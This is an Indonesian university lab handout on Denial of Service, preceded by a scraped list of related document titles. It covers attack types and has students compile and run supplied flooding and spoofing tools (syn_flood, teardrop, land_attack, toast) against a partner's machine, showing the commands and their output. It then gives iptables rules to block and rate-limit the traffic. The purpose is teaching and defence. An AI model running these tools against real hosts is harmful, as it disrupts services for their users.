TUJUAN PEMBELAJARAN: 1. Mengenalkan pada mahasiswa tentang konsep Denial of Service 2. Mahasiswa mampu menangani masalah DoS

dokumen-dokumen yang mirip
Mengapa perlu sebuah keamanan?

Koneksi TCP sebelum Spoofing

Koneksi TCP sebelum Spoofing

TUJUAN PEMBELAJARAN: 1. Mengenalkan pada mahasiswa tentang konsep dasar firewall 2. Mahasiswa mampu melakukan proses filtering menggunakan iptables

PENDETEKSIAN SERANGAN DDOS (DISTRIBUTED DENIAL OF SERVICE) MENGGUNAKAN IDS (INTRUSION DETECTION SYSTEM)

BAB I PENDAHULUAN 1.1 Latar Belakang

MENGENAL JENIS-JENIS SERANGAN DoS (Denial Of Service) TERHADAP SISTEM JARINGAN Muhammad Rudyanto Arief. Abstraksi

Gambar 1. Koneksi TCP sebelum Spoofing

Analisis Kelakuan Denial-of-Service attack (DoS attack) pada Jaringan Komputer dengan Pendekatan pada Level Sekuritas

BAB IV PENGUJIAN DAN ANALISA

TUJUAN PEMBELAJARAN: 1. Mengenalkan pada mahasiswa tentang konsep dasar firewall 2. Mahasiswa mampu melakukan proses filtering menggunakan iptables

Computer Security. Network Security

ARP (Address Resolutio Protocol) Secara internal ARP melakukan resolusi address tersebut dan ARP berhubungan langsung dengan Data Link Layer. ARP meng

SISTEM KEAMANAN JARINGAN DENGAN FIREWALL KATA PENGANTAR

UNIVERSITAS ISLAM NEGERI MAKASSAR

TUJUAN PEMBELAJARAN: 1. Mengenalkan pada mahasiswa tentang konsep dasar firewall 2. Mahasiswa mampu melakukan proses filtering menggunakan iptables

ANALISIS EXPLOTASI KEAMANAN WEB DENIAL OF SERVICE ATTACK

FIREWALL dengan Iptables

BAB III METODE PENELITIAN. Router Berbasis Web, Penulis menerapkan konsep pengembangan Software

Gambar 1. Topologi Jaringan Scanning

Computer Security. Network Security

Sistem Pencegahan UDP DNS Flood dengan Filter Firewall Pada Router Mikrotik

PERALATAN YANG DIBUTUHKAN: 1. Beberapa PC yang akan dihubungkan dalam jaringan. 2. Hub sebagai penghubung jaringan. 3. Kabel jaringan secukupnya.

Praktikum Network Troubleshooting

BAB I PENDAHULUAN 1.1 Latar Belakang

Ancaman & Keamanan Jaringan Komputer. Rijal Fadilah, S.Si

ANALISA SISTEM KEAMANAN INTRUSION DETECTION SYSTEM (IDS)

LAPORAN RESMI PRAKTIKUM KEAMANAN DATA LAPORAN RESMI KONFIGURASI FIREWALL [IPTABLES]

BAB 3 ANALISIS DAN PERANCANGAN SISTEM

Tujuan : Pembahasan ini bertujuan : 1. Mahasiswa memahami jenis-jenis firewall 2. Mahasiswa memahami cara menerapkan firewal di jaringan

LAMPIRAN C PEDOMAN PRAKTIKUM TOPIK 3 PENGUJIAN JARINGAN IPSEC DENGAN JENIS SERANGAN DENIAL OF SERVICE MENGGUNAKAN SOFTWARE LOIC

Bab 4 Implementasi dan Pembahasan

Pokok Bahasan : Pensettingan Services Services Firewall dan Iptables/Ipchains

MAKALAH KEAMANAN JARINGAN KOMPUTER

THREAT PACKET ANALYSIS USING SNORT

BAB IV PENGUJIAN DAN ANALISA DATA

LAPORAN PENDAHULUAN PRAKTIKUM KEAMANAN DATA Network Scanner dan Network Probing

DETEKSI DAN PENCEGAHAN FLOODING DATA PADA JARINGAN KOMPUTER

BAB I PENDAHULUAN. 1.1 Latar Belakang

Praktikum ROUTER DENGAN IP MASQUERADE

BAB 4 IMPLEMENTASI DAN PENGUJIAN

PENDAHULUAN. Bab Latar Belakang

Analisa dan Implementasi Sistem Keamanan Jaringan Komputer dengan Iptables sebagai Firewall Menggunakan Metode Port Knocking

PRAKTIKUM 3 Konfigurasi Firewall [iptables]

JARINGAN KOMPUTER MODUL 4

BAB I PENDAHULUAN. Dalam soal kejahatan dunia maya (cyber crime), Indonesia menempati peringkat

Bab I Pendahuluan BAB I PENDAHULUAN 1.1 LATAR BELAKANG

Posisi Firewall. Switch LAN Firewall

BAB III. Evaluasi Kemanan Sistem Informasi

1. Denial of service adalah jenis serangan yang tujuannya adalah mencegah pengguna yang sesungguhnya menikmati layanan

Network security authentication gateway attack authorization monitoring Komunikasi terenkripsi

JARINGAN KOMPUTER MODUL 3

Eksploitasi Keamanan

Membuat Port Forwarding Dalam IPTables. Ditulis oleh Tutor TKJ CLUB Sabtu, 24 Desember :36 -

BAB III Firewall Sebagai Pelindung dalam Jaringan Komputer

PenTest::DNS Spoofing. Beginner Tutorial v.1

PENCEGAHAN FLOODING PADA JARINGAN KOMPUTER MENGGUNAKAN METODE BLOKIR IP DAN PORT, SNORT DAN WIRESHARK

BAB VI. Eksploitasi Keamanan

BAB 4 IMPLEMENTASI DAN EVALUASI. Untuk membangun sebuah network intrusion detection system (NIDS), dapat

Linux Firewall. Mengal Firewall dan Iptables

BAB 15 KEAMANAN JARINGAN DENGAN FIREWALL

Koneksi TCP sebelum Spoofing

Mengkonfigurasi system Firewall sebagai Internet gateway pada system operasi Debian 6.0

DEBIAN, UBUNTU, CENTOS, SLACKWARE : Penggunaan IP TABLES sebagai FIREWALL

SSH (SECURE SHELL) 7. Masukan password root atau password user account yang ada di dalam PC 8. Kirim pesan ke user lain (SECURE COPY)

BAB IV IMPLEMENTASI DAN PENGUJIAN

Bab 1 Pendahuluan 1.1 Latar Belakang Masalah

SISTEM KEAMANAN JARINGAN DALAM MENCEGAH FLOODING DATA DENGAN METODE BLOKING IP DAN PORT

Modul 1 Network Scanner & Probing

Service atau yang lebih kita kenal dengan DoS. Beberapa pertanyaan. yang mungkin bisa terjawab diantaranya : 1. Apa itu DoS?

IMPLEMENTASI PROXY SEVER MENGGUNAKAN DHCP SERVER BERBASIS LINUX UBUNTU PADA JARINGAN INTERNET SEBAGAI FILTER DAN SECURITY

Denial of Service Ethical Hacking and Countermeasures (PAI ) Program Studi Teknik Informatika, Unsoed

Praktikum Jaringan Komputer 2. Modul 3 BRIDGE FIREWALL dengan Netfilter

Wireshark dapat membaca data secara langsung dari Ethernet, Token-Ring, FDDI, serial (PPP and SLIP), wireless LAN, dan koneksi ATM.

Nama : Aris Triyanto NIM : Makul : Keamanan Jaringan Tanggal : 10 Juni 2015

PROTEKSI PADA SISTEM OPERASI

mengetahui informasi dari hosts target yang akan diserang? 3. Beri kesimpulan dari percobaan-percobaan yang telah anda lakukan diatas!

ANALISIS PERBANDINGAN KINERJA INSTRUSION DETECTION SYSTEM (IDS) SNORT DAN SURICATA DALAM MENDETEKSI SERANGAN DENIAL OF SERVICE PADA SERVER LINUX

Reza Muhammad

Network Scanning. Network Scanning Network scanner adalah metode bagaimana caranya mendapatkan informasi sebanyak-banyaknya dari IP/Network korban.

TUGAS KEAMANAN JARINGAN SNORT

Percobaan : Choirunnisa L.H / D4 LJ IT. Dengan Switch

Gambar 13.1 Sniffing pada jaringan antara router 1 dan 2

Pengendusan Data Ethical Hacking and Countermeasures (PAI ) Program Studi Teknik Informatika, Unsoed

Laporan Resmi Praktikum Keamanan Data. Labba Awwabi Politeknik Elektronika Negeri Surabaya

Konsep DoS dan DDoS (Distributed Denial of Service), serta Mekanisme Serangan DoS dan DdoS dan cara penanggulangannya

BAB 1 PENDAHULUAN. 1.1 Latar Belakang

BAB I PENDAHULUAN 1.1. Latar Belakang Masalah

ANALISIS DAN PENCEGAHAN METODE SERANGAN FLOODING PADA JARINGAN KOMPUTER

Mastering Iptables Seri 1 dan Seri 2

ATTACK TOOLS. Oleh: M. RUDYANTO ARIEF 1

Xcode Intensif Training. Computer Networking. Advanced

PERANCANGAN SISTEM PENCEGAHAN FLOODING DATA PADA JARINGAN KOMPUTER

ROUTER PENGGUNAAN BANYAK ROUTER MENUJU IP ADDRESS TUJUAN. PROYEK 3 Praktikum Jaringan Komputer 1

Xcode Private Training. Network hacking & Security

JARINGAN KOMPUTER. Disusun Oleh : Nama : Febrina Setianingsih NIM : Dosen Pembimbing : Dr. Deris Stiawan, M.T., Ph.D.

Jenis ancaman jaringan Dan Cara mengatasinya

penggunaan frame secara tetap, dapat diketahui ketepatan pengiriman paket data. ArsitekturArcNet Dikembangkan oleh Datapoint Corp. tapi tidak memperol

Load Balancing Sambungan ke Internet dan Monitoring Jaringan

Implementasi Pencegahan ARP Spoofing menggunakan VLAN dan Bandwidth Management

Transkripsi:

DOS DAN PENANGGULANGANNYA TUJUAN PEMBELAJARAN: 1 Mengenalkan pada mahasiswa tentang konsep Denial of Service 2 Mahasiswa mampu menangani masalah DASAR TEORI Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut Dampak akhir dari aktifitas ini menjurus kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal (dalam kasus tertentu) Pada dasarnya Denial of Service merupakan serangan yang sulit diatasi, hal ini disebabkan oleh resiko layanan publik dimana admin akan berada pada kondisi yang membingungkan antara layanan dan kenyamanan terhadap keamanan Seperti yang kita tahu, keyamanan berbanding terbalik dengan keamanan Maka resiko yang mungkin timbul selalu mengikuti hukum ini Beberapa aktifitas adalah: 1 Aktifitas 'flooding' terhadap suatu server 2 Memutuskan koneksi antara 2 mesin 3 Mencegah korban untuk dapat menggunakan layanan 4 Merusak sistem agar korban tidak dapat menggunakan layanan Beberapa tipe-tipe serangan SYN-Flooding SYN-Flooding merupakan network Denial ofservice yang memanfaatkan 'loophole' pada saat koneksi TCP/IP terbentuk Kernel Linux terbaru (2030 dan yang lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of Service dengan mencegahmenolak cracker untuk mengakses sistem Pentium 'FOOF' Bug Merupakan serangan Denial of Service terhadap prosessor Pentium yang menyebabkan sistem menjadi reboot Hal ini tidak bergantung terhadap jenis sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor yang digunakan yaitu pentium Ping Flooding Ping Flooding adalah brute force Denial of Service sederhana Jika serangan dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network) Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP Varian dari serangan ini disebut "smurfing"

Pencegahan Selalu Up 2 Date Seperti contoh serangan diatas, SYN Flooding sangat efektif untuk membekukan Linux kernel 20* Dalam hal ini Linux kernel 2030 keatas cukup handal untuk mengatasi serangan tersebut dikarenakan versi 2030 memiliki option untuk menolak cracker untuk mengakses system Ikuti perkembangan security Hal ini sangat efektif dalam mencegah pengerusakan sistem secara ilegal Banyak admin malas untuk mengikuti issue-issue terbaru perkembangan dunia security Dampak yang paling buruk, sistem cracker yang 'rajin', 'ulet' dan 'terlatih' akan sangat mudah untuk memasuki sistem dan merusak - tidak tertutup kemungkinan untuk melakukan Denial of Service - Menggunakan Firewall TUGAS PENDAHULUAN 1 Dalam arp spoofing ada istilah yang disebut dengan arp cache poisoning, jelaskan dengan singkat apa itu arp cache poisoning! 2 Carilah command untuk melakukan bloking terhadap ip spoofing menggunakan iptables PERCOBAAN 1 Percobaan dan Perilakunya a Bekerjalah dengan teman sebelah untuk melakukan percobaan ini, setiap kelompok minimal 2 orang Satu berfungsi sebagai penyerang, satu berfungsi sebagai target b Siapkan beberapa utility, mintalah source pada dosen/asisten praktikum c Kompilasi dan jalankan beberapa tools yang sudah disiapkan dan komputer target jalankan ethereal Analisa paket yang muncul dan berikan kesimpulan anda a gcc pod_spoofingc o pod_spoofing b /pod_spoofing ip_palsu ip_target a gcc syn_floodc o syn_flood b /syn_flood ip_palsu ip_target port_awal port_akhir

a gcc land_attackc o land_attack b /land_attack t ip_palsu p no_port c jumlah_paket a gcc teardrop+spoofingc o teardrop+spoofing b /teardrop+spoofing ip_target ip_palsu n jumlah_pengulangan Contoh cara menjalankan paket pc1:/home/isbat/soft# ls land_attack pod_dos pod_spoofing syn_flood teardrop+spoofing Jika seperti ini pc1:/home/isbat/soft# /pod_spoofing bash: /pod_spoofing: Permission denied pc1:/home/isbat/soft# ls -l total 84 -rw-r--r-- 1 isbat isbat 15529 2009-03-30 15:05 land_attack -rw-r--r-- 1 isbat isbat 13709 2009-03-30 15:05 pod_dos -rw-r--r-- 1 isbat isbat 13770 2009-03-30 15:05 pod_spoofing -rw-r--r-- 1 isbat isbat 15727 2009-03-30 15:05 syn_flood -rw-r--r-- 1 isbat isbat 18162 2009-03-30 15:05 teardrop+spoofing pc1:/home/isbat/soft# chmod +x * pc1:/home/isbat/soft# ls Cara menjalankan pc1:/home/isbat/soft# /pod_spoofing usage: /pod_spoofing <ip_palsu> <komputer_korban> pc1:/home/isbat/soft# /pod_spoofing 10101010 1025244164 Dikirim ke 1025244164 Analisa ditarget dengan ethereal pc1:/home/isbat/soft# /syn_flood gunakan: /syn_flood <alamat palsu> <alamat korban> <port awal> <port_akhir> pc1:/home/isbat/soft# /syn_flood 10101010 1025244164 1 65000 flooding setiap detik = 25 paket pc1:/home/isbat/soft# /teardrop+spoofing

usage: /teardrop+spoofing <IP_target> <IP_Spoofing> [-n repeats] pc1:/home/isbat/soft# /teardrop+spoofing 1025244164 10101010 packet terkirim ke target / korban: To: 1025244164 Repeats: 1 1025244164 [ (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) ] -all donepc1:/home/isbat/soft# /teardrop+spoofing 1025244164 10101010 -n 10000 packet terkirim ke target / korban: To: 1025244164 Repeats: 10000 1025244164 [ (^_^) (^_^) (^_^) (^_^) 2 Jalankan toast sebagai Tools dan cek lalu lintas data seperti praktikum 1, berikan kesimpulan anda perilaku berdasar besarnya koneksi yang terjadi pens1:/home/isbat/toast# /toastsh 1025210850 1025244178 - s 9 untitled folder 10 \ / / _ / _ \ \ / /\ \ ( <_> ) \_\ \ untitled folder 10 \ ( / > untitled folder 10 \/ \/ By Gridmark _ _ Attempting to find an remote open port Throwing everything we got at 1025210850 Running 1234 Running -Linux Running ascend-foo Running beer

Running biffit 3 Jalankan percobaan pada percobaan 1 sebelumnya pada target jalankan tcpdump dan tulis ke file hasil tcpdump lalu capture data tcpdump dengan chaosreader baca indexhtml hasil chaosreader lihat perilaku berdasarkan besarnya koneksi dan byte yang terkirim Bandingkan dengan hasil nestat 4 Jalankan kembali percobaan 1 tapi sebelumnya lakukan blocking dengan menggunakan iptables, apa yang terjadi Blocking IP Penyerang iptables -I INPUT -s IP_Penyerang/netmask -j DROP Blocking Synflood iptables -A INPUT -p tcp --syn -m limit --limit 5/s -i eth0 -j ACCEPT Blocking Ping of Death iptables -A INPUT -p icmp --icmp-type echo-request \ -m limit --limit 1/s -i eth0 -j ACCEPT 5 Buat Kesimpulan dari percobaan yang anda lakukan